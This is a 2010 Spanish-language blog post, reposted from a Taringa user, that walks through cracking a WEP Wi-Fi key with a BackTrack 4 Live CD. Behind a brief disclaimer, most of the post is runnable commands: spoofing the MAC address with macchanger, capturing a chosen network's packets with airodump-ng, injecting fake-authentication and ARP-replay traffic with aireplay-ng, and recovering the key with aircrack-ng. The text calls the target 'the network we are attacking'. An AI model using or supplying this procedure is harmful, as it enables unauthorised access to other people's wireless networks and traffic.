Averigua claves WEP con BackTrack 4

viernes, 10 de diciembre de 2010 en 9:40

Hoy les voy a enseñar como obtener su clave WEP de su conexión WIFI. En ningún caso desde Sport Tenerife Center queremos que se utilice esta guía para obtener claves de puntos WIFI de forma fraudolenta y no nos haremos responsables de la mala utilización de esta guía. Dicho esto empecemos.

Logicamente lo primero que debemos hacer es bajarnos el programa "BackTrack 4" existen dos tipos de descargas, una para virtualizar desde el VMware o Virtual Box y otra para arrancarlo como Live CD. Ya que no todos los ordenadores tienen los suficientes recursos como para tener un sistema operativo virtualizado lo haremos como Live CD.


Para descargarnos el Live CD del BackTrack 4 pinchen en el icono de la flecha naranja que está justo a la izquierda.

Una cosa muy importante antes de empezar es saber si nuestra tarjeta de red es compatible para obtener los datos que necesitamos de la red WIFI. Si tenemos una tarjeta de red por USB o PCI no deberíamos tener problemas, en cambio si utilizamos una tarjeta de red integrada (viene por defecto en la placa del ordenador) tendremos que ver si es compatible con Linux ya que el BackTrack 4 utiliza Linux, si no sabes si tu tarjeta es compatible inténtalo no tienes nada que perder...

  1. Empecemos, después de haberte descargado el BackTrack 4 lo grabamos en un DVD utilizando el IMGBURN (pinchen sobre el nombre para descargarlo). Para grabarlo, una vez descargado el IMGBURN, seleccionaremos la primera opción (arriba a la izquierda en el ventana principal del IMGBURN). Luego seleccionaremos la ".iso" o imagen del BackTrack 4 descargada con anterioridad y le daremos al icono que nos aparece abajo (si pones el ratón sobre el icono te saldrá "write"). Una vez terminado ya tenemos el Live CD.
  2. Para arrancar el Live CD tendremos que abilitar el arranque del equipo desde CD/DVD esto lo haremos desde la BIOS de nuestro equipo o si nuestro ordenador lo permite dandole al iniciar a secuencia de arranque (normalmente pulsando la tecla "F12" al inicio del arranque del equipo). Todo esto con el DVD del BackTrack 4 en el lector de DVD de nuestro equipo.
  3. Una vez empieza a cargar nos preguntará si lo queremos instalar, cargar desde Live CD y otras opciones, obviamente tendremos que seleccionar la de Live CD.
  4. Cuando termine de cargar en algunos casos nos pedirá Usuario y contraseña, estos son:
      1. Usuario: root 
      2. Contraseña: toor 
      3. Introducelo todo en minusculas
  5. Una vez que termine de cargar todo escribiremos:
      1. startx (arrancar desde modo gráfico).
  6. Ahora debes abrir una terminal (consola de comandos) tiene un icono con un cuadrado en negro.
  7. Ahora escribiremos:
      1. airmon-ng 
        1. Nos dirá el nombre de nuestra tarjeta inalámbrica (wlan0 o eth0 o eth1...) Nos referiremos a ella en los siguientes comandos que escribiremos como TARJETA, es decir, en los comandos donde ponga TARJETA nosotros pondremos wlan0 o la que nos saliera en la pantalla anterior.
      2. airmon-ng stop TARJETA
        1. Paramos el servicio de nuestra TARJETA.
      3. ifconfig TARJETA down
        1. Desabilitamos la tarjeta.
      4. macchanger --mac 00:11:22:33:44:55 TARJETA
        1. Cambiamos la Mac de nuestra tarjeta.
      5. airmon-ng start TARJETA
        1. Abilitamos y arrancamos la tarjeta.
      6. airodump-ng TARJETA
        1. Vemos que redes inalámbricas tenemos a nuestro alcance.
        2. Aquí veremos la red de la cual queremos optener su clave WEP. Para ello tendremos que tener en cuenta en la línea donde aparece el nombre de la red que nos interesa como ESSID (por ejemplo, Belking54), la mac como BSSID (por ejemplo, 66:77:88:99:00:11) que tiene y su canal como CH (por ejemplo 5).
        3. Nos referiremos a ellos en los siguientes comandos como:
          1. ESSID -> ESSID
          2. BSSID -> BSSID
          3. CH -> CANAL
      7. airodump-ng -c CANAL -w prueba --bssid BSSID TARJETA
        1. Capturamos paquetes de la red que nos interesa.
        2. Nos fijaremos donde pone DATA y tendremos que esperar a que llegue por lo menos a 20.000, esto puede tardar horas dependiendo de la afluencia de tráfico que esté teniendo la red a la que le estamos capturando los paquetes.
      8. Abrimos otra terminal y escribimos:
        1. aireplay-ng -1 0 -a BSSID -h 00:11:22:33:44:55 -e ESSID TARJETA
          1. Inyectamos tráfico en la red que estamos atacando.
          2. Nos empezará a salir muchas líneas de código, simplemente esperaremos a que termine.
          3. Debe salirnos que la conexion esta succesfuld.
          4. En caso de que no te funcione puede ser debido a:
            1. La red a la que quieres atacar esta muy lejos.
            2. Tu tarjeta de red no puede hacer inyeccion de paquetes. 
            3. El router tiene seguridad para evitar este tipo de ataques.
        2. aireplay-ng -3 -b BSSID -h 00:11:22:33:44:55 TARJETA
          1. Inyectamos más tráfico.
          2. Si vas a ver a la otra terminal donde estas capturando los paquetes te daras cuenta que la DATA va caminando muy rápido.
      9. Ahora abirmos otra terminal más y escribimos:
        1. aircrack-ng prueba-01.cap
          1. Busca la clave en el archivo prueba donde se han guardado los paquetes capturados.
          2. Esperaremos hasta que salga KEY FOUND.
          3. Si todo ha ido bien hemos conseguido la clave. Nos la mostrará tal que así [XX:XX:XX:XX:XX:XX] , donde le quitaremos los dos puntos entre los números y los corchetes. Nos debe quedar una serie numérica seguida (por ejemplo, 1234567890).
Ya hemos conseguido sacar la clave WEP, espero les sirva esta guía.

Información obtenida de:
Usuario de Taringa: Djdrago
Publicado por Dan
 

©Copyright 2010 Sport Tenerife Center | Recuerda visitarnos en